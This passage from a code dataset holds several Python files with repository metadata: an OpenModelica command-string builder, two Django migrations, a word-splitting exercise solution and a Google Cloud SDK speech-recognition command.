strcommand.append('"')
strcommand.append(_path)
strcommand.append(_model)
strcommand.append('"')
strcommand.append(')')
command = ''.join(strcommand)
command = command.replace('\\','/')
print 'loadFile: ', command
return command
def simulate(self, _model, _simOptions, _modelParams, _isParamsFile):
strcommand= []
strcommand.append('simulate(')
strcommand.append(_model)
if (_simOptions!= ''):
strcommand.append(_simOptions)
if (_isParamsFile):
strcommand.append(',simflags="-overrideFile=')
strcommand.append(_modelParams)
strcommand.append('"')
else:
strcommand.append(',simflags="-override ')
strcommand.append(_modelParams)
strcommand.append('"')
strcommand.append(')')
command = ''.join(strcommand)
command= command.replace('\\','/')
print 'simulate: ', command
return command
def plot(self, _simOutputs):
strcommand= []
strcommand.append('plot({')
for value in _simOutputs:
strcommand.append(value)
strcommand.append(',')
strcommand= strcommand[:-1]
strcommand.append('})')
command = ''.join(strcommand)
return command | [
"fran_jo@hotmail.com"
] | fran_jo@hotmail.com |
d333c66003907d386f6eee513acacbc200c7de8f | 70e047d748d503362cabc0f3ba50f3e103110ff4 | /element/migrations/0002_element_kode_element.py | 0de0334f2d46aeeaf317a647b8acefa1bc8f682a | [] | no_license | gofur/AHS | 621e7982df7c4fbd150e9427b7b408e122a38b07 | b59cba9d29e4ef5e20bf2091a646cd7ec79c3c6f | refs/heads/master | 2021-01-10T10:47:20.159642 | 2016-02-06T12:26:59 | 2016-02-06T12:26:59 | 49,955,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-20 23:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('element', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='element',
name='kode_element',
field=models.CharField(default=1, max_length=8, unique=True),
preserve_default=False,
),
]
| [
"you@example.com"
] | you@example.com |
7cfd21c143ab586aefa2bbe9b4d2f2e0ffe3b867 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /FWh2fGH7aRWALMf3o_12.py | 3ed8ee73f8657d5d9d71f3bacedbcaa8f51841d0 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,341 | py | """
Create a function that takes a string (without spaces) and a word list,
cleaves the string into words based on the list, and returns the correctly
spaced version of the string (a sentence). If a section of the string is
encountered that can't be found on the word list, return `"Cleaving stalled:
Word not found"`.
### Examples
word_list = ["about", "be", "hell", "if", "is", "it", "me", "other", "outer", "people", "the", "to", "up", "where"]
cleave("ifitistobeitisuptome", word_list) ➞ "if it is to be it is up to me"
cleave("hellisotherpeople", word_list) ➞ "hell is other people"
cleave("hellisotterpeople", word_list) ➞ "Cleaving stalled: Word not found"
### Notes
Words on the `word_list` can appear more than once in the string. The
`word_list` is a reference guide, kind of like a dictionary that lists which
words are allowed.
"""
def cleave(string, lst, rec_call=False):
possible_words = []
for ref_word in lst:
if string[:min(len(string), len(ref_word))] == ref_word:
if(len(string) == len(ref_word)):
return string
possible_words.append(ref_word)
for word in possible_words:
result = cleave(string[len(word):], lst, True)
if result is not None:
return word + " " + result
return None if rec_call else "Cleaving stalled: Word not found"
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
fa48c0659171b8c9d8df62405784ad41278d721c | 70d4ef0863906b3ca64f986075cd35b8412b871e | /pipeline/contrib/statistics/migrations/0010_auto_20190304_1747.py | 16379222282ca52e23b319f90809bcf33b6776f6 | [
"MIT",
"BSD-3-Clause",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | selinagyan/bk-sops | 72db0ac33d9c307f51769e4baa181ceb8e1b279e | 39e63e66416f688e6a3641ea8e975d414ece6b04 | refs/heads/master | 2020-05-07T16:44:33.312442 | 2019-04-11T02:09:25 | 2019-04-11T02:09:25 | 180,696,241 | 0 | 0 | null | 2019-04-11T02:07:11 | 2019-04-11T02:07:10 | null | UTF-8 | Python | false | false | 2,783 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
# Generated by Django 1.11.11 on 2019-03-04 09:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('statistics', '0009_auto_20181116_1627'),
]
operations = [
migrations.AlterModelOptions(
name='componentexecutedata',
options={'ordering': ['-id'], 'verbose_name': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u6570\u636e', 'verbose_name_plural': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u6570\u636e'},
),
migrations.AlterModelOptions(
name='componentintemplate',
options={'verbose_name': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u88ab\u5f15\u7528\u6570\u636e', 'verbose_name_plural': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u88ab\u5f15\u7528\u6570\u636e'},
),
migrations.AlterField(
model_name='componentexecutedata',
name='archived_time',
field=models.DateTimeField(blank=True, null=True, verbose_name='\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u7ed3\u675f\u65f6\u95f4'),
),
migrations.AlterField(
model_name='componentexecutedata',
name='elapsed_time',
field=models.IntegerField(blank=True, null=True, verbose_name='\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u8017\u65f6(s)'),
),
migrations.AlterField(
model_name='componentexecutedata',
name='started_time',
field=models.DateTimeField(verbose_name='\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u5f00\u59cb\u65f6\u95f4'),
),
migrations.AlterField(
model_name='instanceinpipeline',
name='atom_total',
field=models.IntegerField(verbose_name='\u6807\u51c6\u63d2\u4ef6\u603b\u6570'),
),
migrations.AlterField(
model_name='templateinpipeline',
name='atom_total',
field=models.IntegerField(verbose_name='\u6807\u51c6\u63d2\u4ef6\u603b\u6570'),
),
]
| [
"pagezhou@tencent.com"
] | pagezhou@tencent.com |
fa284fc48436ccf4f4208b3acd8ddd6f678c9cb3 | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/surface/ml/speech/recognize.py | c88df1addbeabd4903e6f394417536ac17cee4ab | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 4,369 | py | # -*- coding: utf-8 -*- #
# Copyright 2022 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Recognize speech in provided audio."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.ml.speech import flags
from googlecloudsdk.command_lib.ml.speech import util
@base.ReleaseTracks(base.ReleaseTrack.GA)
class RecognizeGA(base.Command):
"""Get transcripts of short (less than 60 seconds) audio from an audio file."""
detailed_help = {
'DESCRIPTION':
"""\
Get a transcript of an audio file that is less than 60 seconds. You can use
an audio file that is on your local drive or a Google Cloud Storage URL.
If the audio is longer than 60 seconds, you will get an error. Please use
`{parent_command} recognize-long-running` instead.
""",
'EXAMPLES':
"""\
To get a transcript of an audio file 'my-recording.wav':
$ {command} 'my-recording.wav' --language-code=en-US
To get a transcript of an audio file in bucket 'gs://bucket/myaudio' with a
custom sampling rate and encoding that uses hints and filters profanity:
$ {command} 'gs://bucket/myaudio' \\
--language-code=es-ES --sample-rate=2200 --hints=Bueno \\
--encoding=OGG_OPUS --filter-profanity
""",
'API REFERENCE':
"""\
This command uses the speech/v1 API. The full documentation for this API
can be found at: https://cloud.google.com/speech-to-text/docs/quickstart-protocol
"""
}
API_VERSION = 'v1'
flags_mapper = flags.RecognizeArgsToRequestMapper()
@classmethod
def Args(cls, parser):
parser.display_info.AddFormat('json')
cls.flags_mapper.AddRecognizeArgsToParser(parser, cls.API_VERSION)
def MakeRequest(self, args, messages):
return messages.RecognizeRequest(
audio=util.GetRecognitionAudioFromPath(args.audio, self.API_VERSION),
config=self.flags_mapper.MakeRecognitionConfig(args, messages))
def Run(self, args):
"""Run 'ml speech recognize'.
Args:
args: argparse.Namespace, The arguments that this command was invoked
with.
Returns:
Nothing.
"""
client = apis.GetClientInstance(util.SPEECH_API, self.API_VERSION)
self._request = self.MakeRequest(args, client.MESSAGES_MODULE)
return client.speech.Recognize(self._request)
def Epilog(self, unused_resources_were_displayed):
util.MaybePrintSttUiLink(self._request)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class RecognizeBeta(RecognizeGA):
__doc__ = RecognizeGA.__doc__
detailed_help = RecognizeGA.detailed_help.copy()
API_VERSION = 'v1p1beta1'
@classmethod
def Args(cls, parser):
super(RecognizeBeta, RecognizeBeta).Args(parser)
cls.flags_mapper.AddBetaRecognizeArgsToParser(parser)
def MakeRequest(self, args, messages):
request = super(RecognizeBeta, self).MakeRequest(args, messages)
self.flags_mapper.UpdateBetaArgsInRecognitionConfig(args, request.config)
return request
RecognizeBeta.detailed_help['API REFERENCE'] = """\
This command uses the speech/v1p1beta1 API. The full documentation for this API
can be found at: https://cloud.google.com/speech-to-text/docs/quickstart-protocol
"""
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class RecognizeAlpha(RecognizeBeta):
__doc__ = RecognizeBeta.__doc__
API_VERSION = 'v1p1beta1'
@classmethod
def Args(cls, parser):
super(RecognizeAlpha, RecognizeAlpha).Args(parser)
cls.flags_mapper.AddAlphaRecognizeArgsToParser(parser, cls.API_VERSION)
def MakeRequest(self, args, messages):
request = super(RecognizeAlpha, self).MakeRequest(args, messages)
self.flags_mapper.UpdateAlphaArgsInRecognitionConfig(args, request.config)
return request
| [
"cloudsdk.mirror@gmail.com"
] | cloudsdk.mirror@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.